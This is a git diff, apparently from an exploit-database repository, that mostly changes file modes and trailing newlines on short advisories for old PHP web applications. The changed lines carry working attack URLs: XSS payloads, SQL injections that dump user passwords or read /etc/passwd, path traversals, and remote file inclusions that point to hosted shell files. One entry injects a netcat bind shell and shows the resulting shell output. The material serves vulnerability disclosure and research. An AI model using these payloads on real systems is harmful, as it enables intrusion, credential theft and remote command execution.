a/platforms/php/webapps/30434.txt b/platforms/php/webapps/30434.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30435.txt b/platforms/php/webapps/30435.txt old mode 100755 new mode 100644 index 862f384ae..8a6ec3d47 --- a/platforms/php/webapps/30435.txt +++ b/platforms/php/webapps/30435.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br IT!CMS 0.2 is vulnerable to these issues; other versions may also be affected. -http://www.example.com/titletext-ed.php?wndtitle=[Xss-script] \ No newline at end of file +http://www.example.com/titletext-ed.php?wndtitle=[Xss-script] \ No newline at end of file diff --git a/platforms/php/webapps/30436.txt b/platforms/php/webapps/30436.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30437.txt b/platforms/php/webapps/30437.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30438.txt b/platforms/php/webapps/30438.txt old mode 100755 new mode 100644 index 68cc295ac..d7a17b48c --- a/platforms/php/webapps/30438.txt +++ b/platforms/php/webapps/30438.txt @@ -6,4 +6,4 @@ An attacker can exploit these issues to include an arbitrary remote file contain Aplomb Poll 1.1 is vulnerable; other versions may also be affected. -http://www.example.com/admin.php?Madoa=http://shell.txt? \ No newline at end of file +http://www.example.com/admin.php?Madoa=http://shell.txt? \ No newline at end of file diff --git a/platforms/php/webapps/3044.txt b/platforms/php/webapps/3044.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30442.txt b/platforms/php/webapps/30442.txt old mode 100755 new mode 100644 index b31a21d2d..41b6f8ded --- a/platforms/php/webapps/30442.txt +++ b/platforms/php/webapps/30442.txt @@ -4,4 +4,4 @@ WebDirector is prone to a cross-site scripting vulnerability because it fails to Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/index.php?deslocal=[xss] \ No newline at end of file +http://www.example.com/index.php?deslocal=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/30443.txt b/platforms/php/webapps/30443.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30445.txt b/platforms/php/webapps/30445.txt old mode 100755 new mode 100644 index 7663ebf28..332578393 --- a/platforms/php/webapps/30445.txt +++ b/platforms/php/webapps/30445.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an attacker to compromise the application and th This issue affects Tour de France Pool 1.0.1; other versions may also be vulnerable. -http://www.example.com/administrator/components/com_tour_toto/admin.tour_toto.php?mosConfig_absolute_path= \ No newline at end of file +http://www.example.com/administrator/components/com_tour_toto/admin.tour_toto.php?mosConfig_absolute_path= \ No newline at end of file diff --git a/platforms/php/webapps/30448.txt b/platforms/php/webapps/30448.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30449.txt b/platforms/php/webapps/30449.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3045.php b/platforms/php/webapps/3045.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30450.txt b/platforms/php/webapps/30450.txt old mode 100755 new mode 100644 index 5284cd588..902c90e28 --- a/platforms/php/webapps/30450.txt +++ b/platforms/php/webapps/30450.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to compromise the application, a LANAI CMS 1.2.14 is vulnerable; other versions may also be affected. -http://www.example.com/module.php?modname=gallery&mf=view&gid=1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,userLogin,userPassword,4/**/FROM/**/tbl_ln_user/* \ No newline at end of file +http://www.example.com/module.php?modname=gallery&mf=view&gid=1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,userLogin,userPassword,4/**/FROM/**/tbl_ln_user/* \ No newline at end of file diff --git a/platforms/php/webapps/30452.txt b/platforms/php/webapps/30452.txt old mode 100755 new mode 100644 index ec364bdf6..62189c217 --- a/platforms/php/webapps/30452.txt +++ b/platforms/php/webapps/30452.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an attacker to compromise the application and th This issue affects J! Reactions 1.8.1; other versions may also be vulnerable. -http://www.example.com/administrator/components/com_jreactions/langset.php?comPath=Evil? \ No newline at end of file +http://www.example.com/administrator/components/com_jreactions/langset.php?comPath=Evil? \ No newline at end of file diff --git a/platforms/php/webapps/30453.txt b/platforms/php/webapps/30453.txt old mode 100755 new mode 100644 index c254faa02..46cb43cf7 --- a/platforms/php/webapps/30453.txt +++ b/platforms/php/webapps/30453.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br These issues affect snif 1.5.2; other versions may also be affected. http://www.example.com/index.php?path=[xss] -http://www.example.com/index.php?download=[xss] \ No newline at end of file +http://www.example.com/index.php?download=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/30456.txt b/platforms/php/webapps/30456.txt old mode 100755 new mode 100644 index 88ca9fa0c..1c7e44bf1 --- a/platforms/php/webapps/30456.txt +++ b/platforms/php/webapps/30456.txt @@ -4,4 +4,4 @@ VietPHP is prone to multiple remote file-include vulnerabilities because it fail Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. -http://www.example.com/_functions.php?dirpath=Sh3LL \ No newline at end of file +http://www.example.com/_functions.php?dirpath=Sh3LL \ No newline at end of file diff --git a/platforms/php/webapps/30457.txt b/platforms/php/webapps/30457.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30459.txt b/platforms/php/webapps/30459.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30463.txt b/platforms/php/webapps/30463.txt old mode 100755 new mode 100644 index 2cf53e98f..74a2b67b8 --- a/platforms/php/webapps/30463.txt +++ b/platforms/php/webapps/30463.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an attacker to compromise the application and th Coppermine 1.3.1 is vulnerable; other versions may also be affected. -http://www.example.com/path/bridge/yabbse.inc.php?sourcedir=[Sh3LL] \ No newline at end of file +http://www.example.com/path/bridge/yabbse.inc.php?sourcedir=[Sh3LL] \ No newline at end of file diff --git a/platforms/php/webapps/30465.txt b/platforms/php/webapps/30465.txt old mode 100755 new mode 100644 index 47e35fef8..51299dbe0 --- a/platforms/php/webapps/30465.txt +++ b/platforms/php/webapps/30465.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to include an arbitrary remote file containin Gastebuch 1.5 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?config[root_ordner]=http://www.example2.com/shell.txt?&cmd=id \ No newline at end of file +http://www.example.com/index.php?config[root_ordner]=http://www.example2.com/shell.txt?&cmd=id \ No newline at end of file diff --git a/platforms/php/webapps/30466.txt b/platforms/php/webapps/30466.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30467.txt b/platforms/php/webapps/30467.txt old mode 100755 new mode 100644 index 199ac2baf..254f42f0f --- a/platforms/php/webapps/30467.txt +++ b/platforms/php/webapps/30467.txt @@ -6,4 +6,4 @@ Exploiting these issues may allow an attacker to compromise the application and File Uploader 1.1 is vulnerable; other versions may also be affected. -http://www.example.com/datei.php?config[root_ordner]=http://www.example2.com/shell.txt?&cmd=id \ No newline at end of file +http://www.example.com/datei.php?config[root_ordner]=http://www.example2.com/shell.txt?&cmd=id \ No newline at end of file diff --git a/platforms/php/webapps/3047.txt b/platforms/php/webapps/3047.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30478.txt b/platforms/php/webapps/30478.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30479.txt b/platforms/php/webapps/30479.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30480.txt b/platforms/php/webapps/30480.txt old mode 100755 new mode 100644 index 4020e2173..b64b561e0 --- a/platforms/php/webapps/30480.txt +++ b/platforms/php/webapps/30480.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an attacker to compromise the application and th Bilder Galerie 1.0 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?config[root_ordner]=http://www.example2.com?cmd=id \ No newline at end of file +http://www.example.com/index.php?config[root_ordner]=http://www.example2.com?cmd=id \ No newline at end of file diff --git a/platforms/php/webapps/30481.txt b/platforms/php/webapps/30481.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30482.txt b/platforms/php/webapps/30482.txt old mode 100755 new mode 100644 index 9d7ae3a00..30d03fe22 --- a/platforms/php/webapps/30482.txt +++ b/platforms/php/webapps/30482.txt @@ -6,4 +6,4 @@ Exploiting these issues may allow an attacker to compromise the application and WebNews 1.1 is vulnerable; other versions may also be affected. -http://www.example.com/feed.php?config[root_ordner]=http://www.example2.com/shell.txt?&cmd=id \ No newline at end of file +http://www.example.com/feed.php?config[root_ordner]=http://www.example2.com/shell.txt?&cmd=id \ No newline at end of file diff --git a/platforms/php/webapps/30483.txt b/platforms/php/webapps/30483.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30486.txt b/platforms/php/webapps/30486.txt old mode 100755 new mode 100644 index 31104162b..c6f758f00 --- a/platforms/php/webapps/30486.txt +++ b/platforms/php/webapps/30486.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an attacker to compromise the application and th Lib2 PHP Library 0.2 is vulnerable; other versions may also be affected. -http://www.example.com/adm/my_statistics.php?DOCUMENT_ROOT=http://www.example2.com/? \ No newline at end of file +http://www.example.com/adm/my_statistics.php?DOCUMENT_ROOT=http://www.example2.com/? \ No newline at end of file diff --git a/platforms/php/webapps/30487.txt b/platforms/php/webapps/30487.txt old mode 100755 new mode 100644 index 40d95085c..d76e454f2 --- a/platforms/php/webapps/30487.txt +++ b/platforms/php/webapps/30487.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Php-Stats 0.1.9.2 is vulnerable; other versions may also be affected. -http://www.example.com/php-stats-path/whois.php?IP=[XSS] \ No newline at end of file +http://www.example.com/php-stats-path/whois.php?IP=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/30488.php b/platforms/php/webapps/30488.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30489.txt b/platforms/php/webapps/30489.txt old mode 100755 new mode 100644 index e43754af1..efa66a71e --- a/platforms/php/webapps/30489.txt +++ b/platforms/php/webapps/30489.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an attacker to compromise the application and th Openads 2.0.11 and prior versions are vulnerable. -http://www.example.com/libraries/lib-remotehost.inc.php?phpAds_geoPlugin=EviL ShEll \ No newline at end of file +http://www.example.com/libraries/lib-remotehost.inc.php?phpAds_geoPlugin=EviL ShEll \ No newline at end of file diff --git a/platforms/php/webapps/3049.php b/platforms/php/webapps/3049.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30492.txt b/platforms/php/webapps/30492.txt old mode 100755 new mode 100644 index 1a255b882..b3542a2eb --- a/platforms/php/webapps/30492.txt +++ b/platforms/php/webapps/30492.txt @@ -6,4 +6,4 @@ A successful exploit could allow an attacker to compromise the application, acce http://www.example.com/index.php?mode=showbyID&jobid=99786'%20union%20all%20select%20something%20from%20something/* http://www.example.com/index.php?mode=showbyID&jobid=99786'%20or%201=1/* -http://www.example.com/index.php?mode=showbyID&jobid=99786'%20order%20by%2016/* \ No newline at end of file +http://www.example.com/index.php?mode=showbyID&jobid=99786'%20order%20by%2016/* \ No newline at end of file diff --git a/platforms/php/webapps/3050.txt b/platforms/php/webapps/3050.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30501.txt b/platforms/php/webapps/30501.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30504.txt b/platforms/php/webapps/30504.txt old mode 100755 new mode 100644 index 6453a8160..62bb13f49 --- a/platforms/php/webapps/30504.txt +++ b/platforms/php/webapps/30504.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to gain administrative access to the affected Versions prior to Olate Download 3.4.2 are vulnerable. -OD3_AutoLogin=17225df9b911486c1ccae0378094c33a::a:3:{i:0;i:2;i:1;s:4:\"imei\";i:2;i:2;} \ No newline at end of file +OD3_AutoLogin=17225df9b911486c1ccae0378094c33a::a:3:{i:0;i:2;i:1;s:4:\"imei\";i:2;i:2;} \ No newline at end of file diff --git a/platforms/php/webapps/30509.txt b/platforms/php/webapps/30509.txt old mode 100755 new mode 100644 index 8d9d82f55..f589ed619 --- a/platforms/php/webapps/30509.txt +++ b/platforms/php/webapps/30509.txt @@ -4,4 +4,4 @@ Dalai Forum is prone to a local file-include vulnerability because it fails to p Exploiting this issue may allow an unauthorized user to view files and execute local scripts. -http://www.example.com/forum/forumreply.php?chemin=../../../../etc/passwd \ No newline at end of file +http://www.example.com/forum/forumreply.php?chemin=../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/3051.txt b/platforms/php/webapps/3051.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30510.txt b/platforms/php/webapps/30510.txt old mode 100755 new mode 100644 index 0ab12bf3f..de8f3d300 --- a/platforms/php/webapps/30510.txt +++ b/platforms/php/webapps/30510.txt @@ -4,4 +4,4 @@ Firesoft is prone to a remote file-include vulnerability because it fails to suf Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible. -http://www.example.com/path/includes/class/class_tpl.php?cache_file=http://SHELLURL? \ No newline at end of file +http://www.example.com/path/includes/class/class_tpl.php?cache_file=http://SHELLURL? \ No newline at end of file diff --git a/platforms/php/webapps/30511.txt b/platforms/php/webapps/30511.txt old mode 100755 new mode 100644 index df08c32a4..55d8ce7a3 --- a/platforms/php/webapps/30511.txt +++ b/platforms/php/webapps/30511.txt @@ -4,4 +4,4 @@ Gurur Haber is prone to an SQL-injection vulnerability because it fails to suffi Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/uyeler2.php?id=-1%20union+select+0,kadi,2,id,sifre,5,6,7,8,9,10,11+from+uyeler \ No newline at end of file +http://www.example.com/uyeler2.php?id=-1%20union+select+0,kadi,2,id,sifre,5,6,7,8,9,10,11+from+uyeler \ No newline at end of file diff --git a/platforms/php/webapps/30515.txt b/platforms/php/webapps/30515.txt old mode 100755 new mode 100644 index b9dd328c1..d7b991035 --- a/platforms/php/webapps/30515.txt +++ b/platforms/php/webapps/30515.txt @@ -4,4 +4,4 @@ coWiki is prone to a cross-site scripting vulnerability because the application An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/?cmd=srchdoc&q=[XSS] \ No newline at end of file +http://www.example.com/?cmd=srchdoc&q=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/30516.txt b/platforms/php/webapps/30516.txt old mode 100755 new mode 100644 index a2af82324..aaba99919 --- a/platforms/php/webapps/30516.txt +++ b/platforms/php/webapps/30516.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow m-phorum 0.3 is vulnerable; other versions may also be affected. -http://www.example.com/?go=[XSS] \ No newline at end of file +http://www.example.com/?go=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/30518.txt b/platforms/php/webapps/30518.txt old mode 100755 new mode 100644 index cce138b6c..872ecb398 --- a/platforms/php/webapps/30518.txt +++ b/platforms/php/webapps/30518.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to steal cookie-based authentica These issues affect versions prior to Ripe Website Manager 0.8.10. -http://example.com/admin/pages/delete_page.php?id=0 or 1=1 \ No newline at end of file +http://example.com/admin/pages/delete_page.php?id=0 or 1=1 \ No newline at end of file diff --git a/platforms/php/webapps/30520.txt b/platforms/php/webapps/30520.txt old mode 100755 new mode 100644 index 6bb2714de..1ecc79574 --- a/platforms/php/webapps/30520.txt +++ b/platforms/php/webapps/30520.txt @@ -4,4 +4,4 @@ WordPress Pool is prone to a cross-site scripting vulnerability because the appl An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/index.php/%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com/index.php/%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/30525.txt b/platforms/php/webapps/30525.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3053.txt b/platforms/php/webapps/3053.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30531.txt b/platforms/php/webapps/30531.txt old mode 100755 new mode 100644 index 51b499edc..3c648a71e --- a/platforms/php/webapps/30531.txt +++ b/platforms/php/webapps/30531.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow AutoIndex PHP Script 2.2.1 is vulnerable; other versions may also be affected. -http://www.example.com/AutoIndex/index.php?search=asdf&search_mode=[xss] \ No newline at end of file +http://www.example.com/AutoIndex/index.php?search=asdf&search_mode=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/30533.txt b/platforms/php/webapps/30533.txt old mode 100755 new mode 100644 index 81662554f..45df26287 --- a/platforms/php/webapps/30533.txt +++ b/platforms/php/webapps/30533.txt @@ -4,4 +4,4 @@ Calendar Events is prone to an SQL-injection vulnerability because it fails to s Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/viewevent.php?id=-1' union select 1,load_file('/etc/passwd'),1,1/* \ No newline at end of file +http://www.example.com/viewevent.php?id=-1' union select 1,load_file('/etc/passwd'),1,1/* \ No newline at end of file diff --git a/platforms/php/webapps/30534.txt b/platforms/php/webapps/30534.txt old mode 100755 new mode 100644 index 8ef1f5529..1df79cfa1 --- a/platforms/php/webapps/30534.txt +++ b/platforms/php/webapps/30534.txt @@ -6,4 +6,4 @@ Exploiting this vulnerability may allow an attacker to perform cross-site script PhpGedView 4.1 is vulnerable; other versions may also be affected. -http://www.example.com/genealogy/login.php?action=login&username=[xss] \ No newline at end of file +http://www.example.com/genealogy/login.php?action=login&username=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/30539.txt b/platforms/php/webapps/30539.txt old mode 100755 new mode 100644 index f86d60d95..39a56b6c7 --- a/platforms/php/webapps/30539.txt +++ b/platforms/php/webapps/30539.txt @@ -10,4 +10,4 @@ http://www.example.com/index.php?menu=showarticle&aid=[SQL INJECTION] http://www.example.com/index.php?menu=showarticle&aid=-3 UNION ALL SELECT 1,@@version,3,4,5,user(),7 http://www.example.com/index.php?menu=showcat&catid=[SQL INJECTION] -http://www.example.com/index.php?menu=showcat&catid=-3 UNION ALL SELECT 1,@@version \ No newline at end of file +http://www.example.com/index.php?menu=showcat&catid=-3 UNION ALL SELECT 1,@@version \ No newline at end of file diff --git a/platforms/php/webapps/3054.txt b/platforms/php/webapps/3054.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30553.txt b/platforms/php/webapps/30553.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30554.txt b/platforms/php/webapps/30554.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30555.txt b/platforms/php/webapps/30555.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30556.html b/platforms/php/webapps/30556.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30557.txt b/platforms/php/webapps/30557.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30558.txt b/platforms/php/webapps/30558.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30559.txt b/platforms/php/webapps/30559.txt old mode 100755 new mode 100644 index 648f4b210..f04fc52df --- a/platforms/php/webapps/30559.txt +++ b/platforms/php/webapps/30559.txt @@ -6,4 +6,4 @@ An attacker could exploit these issues to execute local script code in the conte Versions prior to Claroline 1.8.6 are vulnerable. -http://www.example.com/admin/campusProblem.php?view=[XSS] \ No newline at end of file +http://www.example.com/admin/campusProblem.php?view=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/30560.txt b/platforms/php/webapps/30560.txt old mode 100755 new mode 100644 index 48611a8cb..a1dd498a9 --- a/platforms/php/webapps/30560.txt +++ b/platforms/php/webapps/30560.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Webboard 6.30 is vulnerable; other versions may also be affected. -http://www.example.com/Board/read.php?id=[SQL] \ No newline at end of file +http://www.example.com/Board/read.php?id=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/30568.txt b/platforms/php/webapps/30568.txt old mode 100755 new mode 100644 index 1202a100d..af911fab1 --- a/platforms/php/webapps/30568.txt +++ b/platforms/php/webapps/30568.txt @@ -4,4 +4,4 @@ Pulsewiki and Pawfaliki are prone to a local file-include vulnerability because Exploiting this issue may allow an unauthorized user to view files and execute local scripts. -http://www.example.com/index.php?page=../../../../../../../../../etc/passwd \ No newline at end of file +http://www.example.com/index.php?page=../../../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/3057.php b/platforms/php/webapps/3057.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30570.txt b/platforms/php/webapps/30570.txt old mode 100755 new mode 100644 index 8a2f29906..9aa864f16 --- a/platforms/php/webapps/30570.txt +++ b/platforms/php/webapps/30570.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br These issues are related to the vulnerabilities discussed in BID 25507 (Toms Gästebuch Multiple Cross-Site Scripting Vulnerabilities) and may be a result of an incomplete fix for those issues. -http://www.example.com//admin/header.php?lang[adminseite]=XSS&lang[ueberschrift]=XSS&einst[metachar]=XSS \ No newline at end of file +http://www.example.com//admin/header.php?lang[adminseite]=XSS&lang[ueberschrift]=XSS&einst[metachar]=XSS \ No newline at end of file diff --git a/platforms/php/webapps/30572.txt b/platforms/php/webapps/30572.txt old mode 100755 new mode 100644 index 7e0e53d10..3a34b79d5 --- a/platforms/php/webapps/30572.txt +++ b/platforms/php/webapps/30572.txt @@ -7,4 +7,4 @@ A successful exploit may allow an attacker to steal cookie-based authentication These issues affect phpMyQuote 0.20; other versions may also be vulnerable. http://example.com/script_path/index.php?action=edit&id=[Sql injection] -http://example.com/script_path/index.php?action=edit&id=[XSS] \ No newline at end of file +http://example.com/script_path/index.php?action=edit&id=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/30573.txt b/platforms/php/webapps/30573.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30575.txt b/platforms/php/webapps/30575.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30576.txt b/platforms/php/webapps/30576.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30577.txt b/platforms/php/webapps/30577.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30581.txt b/platforms/php/webapps/30581.txt old mode 100755 new mode 100644 index 11619c630..c3a96044a --- a/platforms/php/webapps/30581.txt +++ b/platforms/php/webapps/30581.txt @@ -4,4 +4,4 @@ CS-Guestbook is prone to an information-disclosure vulnerability because the app An attacker can exploit this issue to access sensitive information that may lead to further attacks. -http://www.example.com/guest/base/usr/0.php \ No newline at end of file +http://www.example.com/guest/base/usr/0.php \ No newline at end of file diff --git a/platforms/php/webapps/30583.txt b/platforms/php/webapps/30583.txt old mode 100755 new mode 100644 index 5441be8bc..1dc3740da --- a/platforms/php/webapps/30583.txt +++ b/platforms/php/webapps/30583.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow This issue affects Php-Stats 0.1.9.2; other versions may also be affected. -http://www.example.com/php-stats-path/tracking.php?what=online&ip=[XSS] \ No newline at end of file +http://www.example.com/php-stats-path/tracking.php?what=online&ip=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/30588.txt b/platforms/php/webapps/30588.txt old mode 100755 new mode 100644 index 233aaace4..bf47558b9 --- a/platforms/php/webapps/30588.txt +++ b/platforms/php/webapps/30588.txt @@ -11,4 +11,4 @@ http://www.example.com/simplePHPLinux/3payment_receive.php?paymentin fo=`/bin/nc -l -p6666 -e /bin/bash` $ telnet www.example.com 6666 $ id -uid=33(www-data) gid=33(www-data) groups=33(www-data) \ No newline at end of file +uid=33(www-data) gid=33(www-data) groups=33(www-data) \ No newline at end of file diff --git a/platforms/php/webapps/3059.txt b/platforms/php/webapps/3059.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30594.txt b/platforms/php/webapps/30594.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30595.txt b/platforms/php/webapps/30595.txt old mode 100755 new mode 100644 index 623c1c52d..783e3e5b6 --- a/platforms/php/webapps/30595.txt +++ b/platforms/php/webapps/30595.txt @@ -6,4 +6,4 @@ Attackers can exploit these issues to steal cookie-based authentication credenti Coppermine Photo Gallery 1.4.12 is vulnerable; other versions may also be affected. -http://localhost/cpg/viewlog.php?log=../../../../../../../../../etc/passwd%00 \ No newline at end of file +http://localhost/cpg/viewlog.php?log=../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/30596.txt b/platforms/php/webapps/30596.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30601.txt b/platforms/php/webapps/30601.txt old mode 100755 new mode 100644 index 815d6f42d..de23b2484 --- a/platforms/php/webapps/30601.txt +++ b/platforms/php/webapps/30601.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Vigile CMS 1.8 is vulnerable; other versions may also be affected. http://www.example.com/[VIGILE_CMS_PATH]/index.php?nav=[WIKINAME]&title=[XSS] -http://www.example.com/[VIGILE_CMS_PATH]/index.php?nav=[WIKINAME]&cat=[XSS] \ No newline at end of file +http://www.example.com/[VIGILE_CMS_PATH]/index.php?nav=[WIKINAME]&cat=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/30602.html b/platforms/php/webapps/30602.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30603.html b/platforms/php/webapps/30603.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30607.txt b/platforms/php/webapps/30607.txt old mode 100755 new mode 100644 index bb1351fe5..5bfe6a7fb --- a/platforms/php/webapps/30607.txt +++ b/platforms/php/webapps/30607.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to compromise the application, access This issue affects bcoos Arcade module 1.0.10; other versions may also be affected. -http://www.example.com/modules/arcade/index.php?act=play_game&gid=[SQL] \ No newline at end of file +http://www.example.com/modules/arcade/index.php?act=play_game&gid=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/30614.txt b/platforms/php/webapps/30614.txt old mode 100755 new mode 100644 index ce6f6202a..991d270cc --- a/platforms/php/webapps/30614.txt +++ b/platforms/php/webapps/30614.txt @@ -4,4 +4,4 @@ Dance Music is prone to a local file-include vulnerability because it fails to p Exploiting this issue may allow an unauthorized remote user to view files and execute local scripts in the context of the webserver process. -http://www.example.com/modules.php?name=Dance_Music-MM&page=1&ACCEPT_FILE[1]=../../../../../../../../../etc/passwd \ No newline at end of file +http://www.example.com/modules.php?name=Dance_Music-MM&page=1&ACCEPT_FILE[1]=../../../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/30615.txt b/platforms/php/webapps/30615.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30616.txt b/platforms/php/webapps/30616.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30617.txt b/platforms/php/webapps/30617.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30618.txt b/platforms/php/webapps/30618.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30632.txt b/platforms/php/webapps/30632.txt old mode 100755 new mode 100644 index a983287e5..8064a888e --- a/platforms/php/webapps/30632.txt +++ b/platforms/php/webapps/30632.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow This issue affects DRBGuestbook 1.1.13; other versions may also be vulnerable. -http://www.example.com/index.php?action=<script>alert("XSS");</script> \ No newline at end of file +http://www.example.com/index.php?action=<script>alert("XSS");</script> \ No newline at end of file diff --git a/platforms/php/webapps/30633.txt b/platforms/php/webapps/30633.txt old mode 100755 new mode 100644 index 8fa132280..45e1260dc --- a/platforms/php/webapps/30633.txt +++ b/platforms/php/webapps/30633.txt @@ -4,4 +4,4 @@ UebiMiau is prone to a cross-site scripting vulnerability because it fails to pr Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/index.php?lid=de&tid=modern_blue&f_user=&six=&f_email=[XSS] \ No newline at end of file +http://www.example.com/index.php?lid=de&tid=modern_blue&f_user=&six=&f_email=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/30634.txt b/platforms/php/webapps/30634.txt old mode 100755 new mode 100644 index 7a6df380e..3501bdcc3 --- a/platforms/php/webapps/30634.txt +++ b/platforms/php/webapps/30634.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an attacker to compromise the application and th C*B 0.7.5 is vulnerable; other versions may also be affected. -http://www.example.com/libraries/comment/postComment.php?path[cb]=[Shell URL]?a= \ No newline at end of file +http://www.example.com/libraries/comment/postComment.php?path[cb]=[Shell URL]?a= \ No newline at end of file diff --git a/platforms/php/webapps/30637.js b/platforms/php/webapps/30637.js old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30638.txt b/platforms/php/webapps/30638.txt old mode 100755 new mode 100644 index 7e2596f59..96783e957 --- a/platforms/php/webapps/30638.txt +++ b/platforms/php/webapps/30638.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to steal cookie-based authenticati This issue affects GForge 4.6; other versions may also be affected. -http://www.example.com/GForgePath/account/verify.php?confirm_hash="/><p>This must not happen</p> \ No newline at end of file +http://www.example.com/GForgePath/account/verify.php?confirm_hash="/><p>This must not happen</p> \ No newline at end of file diff --git a/platforms/php/webapps/30640.txt 